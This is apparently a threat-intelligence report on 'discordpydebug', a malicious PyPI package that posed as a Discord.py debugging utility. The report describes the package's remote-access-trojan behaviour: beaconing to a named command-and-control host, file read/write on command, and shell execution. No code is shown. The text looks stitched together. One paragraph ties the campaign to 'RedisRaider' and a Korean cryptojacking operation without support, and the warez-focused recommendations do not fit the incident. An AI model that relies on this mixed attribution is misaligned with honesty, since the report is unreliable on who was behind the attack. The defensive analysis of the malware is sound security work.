Malicious PyPi Package Targeting Discord Developers

Summary

In March 2022, a malicious Python package named ‘discordpydebug’ was uploaded to PyPI. It posed as a debugging utility for Discord.py developers but secretly functioned as a Remote Access Trojan (RAT). It was specifically designed to target developers working on Discord bots often small teams or individuals who may install tools without thorough scrutiny.

Figure 1 – Malicious Python Package (Source: Socket.dev)

Exploiting PyPI’s limited security checks and the inherently trusting nature of developer communities on Discord, the package gained over 11,000 downloads despite lacking documentation. The incident underscores how threat actors can weaponize trust and social engineering in peer-driven environments, promoting harmful tools under the guise of helpful utilities.

Further investigation into the Command and Control (C&C) infrastructure used by RedisRaider revealed that it also supports a separate cryptojacking operation involving an in-browser cryptocurrency miner hosted on a South Korean web server. This finding implies that the attacker is actively running multiple coordinated cryptojacking campaigns across various platforms and geographic locations, showcasing a broader and more organized cybercriminal operation.

Technical Analysis

Once installed, the package initiates communication with an attacker-controlled command-andcontrol (C&C) server located at backstabprotection.jamesx123.repl.co. The malicious behavior begins with the execution of the run() function, which sends a POST request to the server, including a "name" value—presumably used to identify the compromised host. This connection occurs silently and without the user's knowledge or consent, effectively enrolling the system into the attacker’s C&C infrastructure.

Figure 2 - Command and Control Initialization (Source – Socket.dev)

The backdoor is equipped with utility functions that enable reading from and writing to files on the victim’s machine. These functions leverage standard JSON operations, making it possible for the attacker to access or alter local files when commanded. When the C&C server sends specific keywords like readfile or writefile, the backdoor responds by interacting with the specified file paths. This capability allows the attacker to view or manipulate sensitive information, such as configuration files, authentication tokens, and stored credentials.

Figure 3 - File manipulation capabilities (Source – Socket.dev)

The main functionality is embedded within a continuous loop inside the debug() function, which runs endlessly, sending requests to the attacker’s server every second to check for new commands. Based on the instructions received, the malware can perform actions such as reading or writing files or executing arbitrary shell commands on the compromised system.

Figure 4 - Polling loop and command execution (Source – Socket.dev)

The logic, while simple, is highly dangerous. It performs three main operations: reading files, writing files, and executing shell commands. The loop captures the output of these actions, encodes it, and sends it back to the attacker via another POST request effectively transforming the infected system into a remotely controlled bot.

The runcommand() function is responsible for executing shell commands sent from the C&C server:

Figure 4 - Executing shell commands (Source – Socket.dev)

This gives the attacker complete control over the compromised system, restricted only by the permission level of the Python process running the malware.

Recommendations

• Avoid downloading pirated software from warez/torrent websites. The "Hack Tool" on sites such as YouTube, Torrent sites, etc., contains such malware.

• Use strong passwords and enforce multi-factor authentication wherever possible.

• Turn on the automatic software update feature on your computer, mobile, and other connected devices.

• Use reputable anti-virus and internet security software on your connected devices, including your PC, laptop, and mobile device.

• Refrain from opening untrusted links and email attachments without first verifying their authenticity.

• Educate employees on protecting themselves from threats like phishing/untrusted URLs.

• Block URLs that could be used to spread the malware, e.g., Torrent/Warez.

• Monitor the beacon on the network level to block data exfiltration by malware or TAs.

• Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

Conclusion

This incident serves as a stark reminder of the growing risks associated with open-source software ecosystems and the ease with which malicious actors can exploit community trust. By disguising a remote access trojan as a helpful debugging tool, the attacker was able to infiltrate thousands of developer systems through a popular package repository. The lack of thorough vetting on platforms like PyPI, combined with the informal sharing culture within developer communities, particularly on Discord, creates an ideal environment for such threats to spread. Developers must remain vigilant, scrutinize third-party packages, and adopt security best practices to protect their systems and data. This case underscores the urgent need for improved supply chain security and greater awareness of social engineering tactics in developer ecosystems.